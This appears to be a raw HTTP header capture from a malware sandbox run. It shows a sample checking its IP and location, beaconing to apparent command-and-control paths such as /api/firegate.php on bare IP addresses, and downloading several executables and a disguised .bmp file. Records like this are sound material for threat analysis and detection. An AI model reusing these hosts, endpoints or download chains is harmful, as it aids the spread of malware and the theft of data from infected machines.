GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EQNdzyHxfy%2FhG8%2B6NjdoS5lAlqocdqh%2BpDem0XSAA%2BPjES731gjDyIigZoWNFJ%2FWSEdwiL42%2BXPfpzw4HKfSJ3Iy9AYe8AQgqk4gMcIT%2FgQb0NZlNgIWCh5L%2F9RbFQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451c03aae58372-KIX

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: yandex.ru

HTTP/1.1 302 Moved temporarily Accept-CH: Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-WoW64, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version, Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Cache-Control: max-age=1209600,private Date: Wed, 11 Oct 2023 06:40:05 GMT Location: https://dzen.ru/?yredirect=true NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Portal: Home Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]} Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Robots-Tag: unavailable_after: 12 Sep 2022 00:00:00 PST X-Yandex-Req-Id: 1697006405051030-9841952580925444844-balancer-l7leveler-kubr-yp-sas-89-BAL-7547 set-cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Fri, 10 Oct 2025 06:40:05 GMT set-cookie: is_gdpr_b=CK28eRCx0wEoAg==; Path=/; Domain=.yandex.ru; Expires=Fri, 10 Oct 2025 06:40:05 GMT set-cookie: _yasc=jnS+kuWNlcxKAVhnlZUjNQmTGc9/vS1hj2D7MSnCo4Q0aOHRYL3769NDpRWg1Na/SSQc; domain=.yandex.ru; path=/; expires=Sat, 08 Oct 2033 06:40:05 GMT; secure set-cookie: i=3sBAgysOVT7ctJB9l+heepFHTyxMl8Aeywg65ZxebdVTjOIv+eZ6aoRbjdxrIHQtbogOvw1+zdvkFZH55quAqss24OY=; Expires=Fri, 10-Oct-2025 06:40:05 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly set-cookie: yandexuid=7254448441697006405; Expires=Fri, 10-Oct-2025 06:40:05 GMT; Domain=.yandex.ru; Path=/; Secure set-cookie: yashr=918973111697006405; Path=/; Domain=.yandex.ru; Expires=Thu, 10 Oct 2024 06:40:05 GMT; Secure; HttpOnly

GET /?yredirect=true HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dzen.ru

HTTP/1.1 302 Found Content-Length: 0 Content-Type: application/json;charset=utf-8 Date: Wed, 11 Oct 2023 06:40:07 GMT Location: https://sso.passport.yandex.ru/push?uuid=b09af16e-2e62-4304-9cf5-7f2d1c90ff55&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue Set-Cookie: zen_sso_checked=1; Path=/; Domain=.dzen.ru; Expires=Wed, 11-Oct-2023 18:40:07 GMT; Max-Age=43200; Secure; HttpOnly Set-Cookie: _yasc=3bq0X2sWwedDdntRhGgYOq8LMGoz7VqVYzqPtii8Sw0Pe1QsKQlP1MlYVYHFfWaJvA==; domain=.dzen.ru; path=/; expires=Sat, 08 Oct 2033 06:40:07 GMT; secure

GET /push?uuid=b09af16e-2e62-4304-9cf5-7f2d1c90ff55&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sso.passport.yandex.ru Cookie: yashr=918973111697006405; yandexuid=7254448441697006405; i=3sBAgysOVT7ctJB9l+heepFHTyxMl8Aeywg65ZxebdVTjOIv+eZ6aoRbjdxrIHQtbogOvw1+zdvkFZH55quAqss24OY=; _yasc=jnS+kuWNlcxKAVhnlZUjNQmTGc9/vS1hj2D7MSnCo4Q0aOHRYL3769NDpRWg1Na/SSQc; is_gdpr_b=CK28eRCx0wEoAg==; is_gdpr=0

HTTP/1.1 200 OK Server: nginx Date: Wed, 11 Oct 2023 06:40:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1959 Connection: close Vary: Accept-Encoding X-Download-Options: noopen X-Content-Type-Options: nosniff Surrogate-Control: no-store Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Expires: 0 X-DNS-Prefetch-Control: off X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none'; frame-ancestors https://*.dzen.ru https://dzen.ru; connect-src 'self'; script-src 'nonce-a8195f1f8b9cfca22c70fafa779be5f6' 'self'; img-src 'self' Set-Cookie: mda2_beacon=1697006410065; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Set-Cookie: ys=c_chck.3865249150; Domain=.yandex.ru; Secure; Path=/ Set-Cookie: mda2_domains=dzen.ru; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Referrer-Policy: origin ETag: W/"7a7-cjwBhKCUzuwqsRecH8yq7tk8DUM" Strict-Transport-Security: max-age=315360000; includeSubDomains

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:40:11 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 328249 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:15 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FEmmz%2FPZV4cLQ1VG8aRepqCD9be5RgBfzo79dBFzVuq%2FisSNpk4lpzFNaFiflDAEcHHD7NXryo9fzhiWfBrHawF3DUf3S8jgfKrVekZE%2FA0KOKdd9vh5x5E0Ykt2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451c4b3cf283c0-KIX alt-svc: h3=":443"; ma=86400

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cache-control: max-age=28800 x-iplb-request-id: AC46E919:9420_93878F2E:0050_65263F86_452D90:0401 x-iplb-instance: 30783 CF-Cache-Status: HIT Age: 970 Last-Modified: Wed, 11 Oct 2023 06:24:06 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ZHwZsvk4lIEVR0zOzG1pZIKrfs3x5Hd9AQsvSd5lBhI3AWzy9cfbw2ECv4JDeIL3I2agIL4FheNgyO2ILNAinZwWMLoVfU0BBNMdpmDi4mTw2LOXj5h7OQoLA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451c55de9c8335-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:17 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive access-control-allow-origin: http*://*db-ip.com cache-control: max-age=180 x-iplb-request-id: AC46E906:FDF8_93878F2E:0050_65264350_45524F:03FF x-iplb-instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1wUaBrt3bwcPH7bUE3pZ1jCprsJctXoc9PlNahB%2By1gFCiEazWtQ%2B6N2b4z1r9nJMTDeopqJ4%2FYgXcPVX9O95KXJjhnacs%2BTtfzVSHs4%2Bak9TczzSMXDLI7Te617Xus%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451c583c0f8d04-KIX alt-svc: h3=":443"; ma=86400

GET /doc52355237_666782820?hash=ArroX66l9eYl49eAHc8hpGG9y4ueo0YcyAXCK6pwb68&dl=kNiFdjjHEiGZauYFHzX4HcInvoKLFcTYwmBCbWjJoNw&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9084859165978321387_8BShO2JEO4NwXZuezvPSowO6CTEla0nFYHePPaUgC2X; remixlgck=ab98f408bfdbed871a; remixstid=1102573787_qI9R7rbokZJmmtXWGu59qjU58w7o4KNmXDZuJh1iufg

HTTP/1.1 302 Found Server: kittenx Date: Wed, 11 Oct 2023 06:40:18 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114791 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-20.userapi.com/c909618/u52355237/docs/d14/c31569dfbdeb/tmvwr.bmp?extra=yxC_ij_BEaCeg17_3RBMDQ1BNAZNk2h_OM7eSsW8UFjriQQEuPjhkmx7r0l5RwikTTTaRs8JC_WeZ6J1ia9pemH-qujCGGdFQ4qt1HjhdnUs91Pu9zHKbqwz31PEAhQxeOFJQPN_beZxT45a X-Frontend: front220205 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u52355237/docs/d14/c31569dfbdeb/tmvwr.bmp?extra=yxC_ij_BEaCeg17_3RBMDQ1BNAZNk2h_OM7eSsW8UFjriQQEuPjhkmx7r0l5RwikTTTaRs8JC_WeZ6J1ia9pemH-qujCGGdFQ4qt1HjhdnUs91Pu9zHKbqwz31PEAhQxeOFJQPN_beZxT45a HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-20.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Wed, 11 Oct 2023 06:40:19 GMT Content-Type: image/x-ms-bmp Content-Length: 10259772 Connection: keep-alive Last-Modified: Tue, 10 Oct 2023 12:37:59 GMT ETag: "652545a7-9c8d3c" Expires: Fri, 10 Nov 2023 06:40:19 GMT Cache-Control: max-age=2592000 X-Frontend: front6-20 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Accept-Ranges: bytes

GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:35 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SLNF5jCVWQ1t2nM3BSfe%2B5b%2BjZTvS0KqFUr1rID3KRRaPUw6MDdxGO2YRnIWk7nRTnc6nIyJjqR9j1zXopv7gYTaPIOPvEhitDbcTMB66l6P%2BHsS2HRWHhxMUbO%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 81451cc8cb2c836d-KIX alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:09 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:10 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:17 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 4568 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:21 GMT ETag: "3fde00-6067cccc77333" Accept-Ranges: bytes Content-Length: 4185600 Content-Type: application/x-msdos-program

HEAD /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.232 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Wed, 11 Oct 2023 06:18:43 GMT ETag: "6fd08-6076acb8b9cef" Accept-Ranges: bytes Content-Length: 457992 Content-Type: application/x-msdownload

HEAD /carryspend.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.212 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 10 Oct 2023 12:57:46 GMT ETag: "193000-6075c40da775a" Accept-Ranges: bytes Content-Length: 1650688 Content-Type: application/x-msdos-program

HEAD /navi/kur90.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.249 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 11 Oct 2023 06:32:49 GMT ETag: "105200-6076afdffabb9" Accept-Ranges: bytes Content-Length: 1069568 Content-Type: application/x-msdos-program

GET /carryspend.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.212 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 10 Oct 2023 12:57:46 GMT ETag: "193000-6075c40da775a" Accept-Ranges: bytes Content-Length: 1650688 Content-Type: application/x-msdos-program

GET /download/Services.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:21 GMT ETag: "3fde00-6067cccc77333" Accept-Ranges: bytes Content-Length: 4185600 Content-Type: application/x-msdos-program

GET /autorun.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.232 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:15 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Wed, 11 Oct 2023 06:18:43 GMT ETag: "6fd08-6076acb8b9cef" Accept-Ranges: bytes Content-Length: 457992 Content-Type: application/x-msdownload

GET /navi/kur90.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.68.249 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 11 Oct 2023 06:32:49 GMT ETag: "105200-6076afdffabb9" Accept-Ranges: bytes Content-Length: 1069568 Content-Type: application/x-msdos-program

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:39:19 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="63pq846w8qit.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 497 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:01 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:02 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 8049 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:04 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:05 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:06 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:13 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 620 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:14 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /zinda.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Oct 2023 06:40:15 GMT Content-Type: application/octet-stream Content-Length: 15877632 Last-Modified: Tue, 10 Oct 2023 16:10:35 GMT Connection: keep-alive ETag: "6525777b-f24600" Accept-Ranges: bytes

HEAD /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Oct 2023 06:40:15 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Wed, 11 Oct 2023 06:40:15 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 3 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /super.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Oct 2023 06:40:15 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive

GET /zinda.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.9.74.80 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 11 Oct 2023 06:40:15 GMT Content-Type: application/octet-stream Content-Length: 15877632 Last-Modified: Tue, 10 Oct 2023 16:10:35 GMT Connection: keep-alive ETag: "6525777b-f24600" Accept-Ranges: bytes

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 403 Forbidden Date: Wed, 11 Oct 2023 06:40:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4520 Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Wed, 11 Oct 2023 06:40:32 GMT Server: cloudflare CF-RAY: 81451c5b88bba7d8-ICN

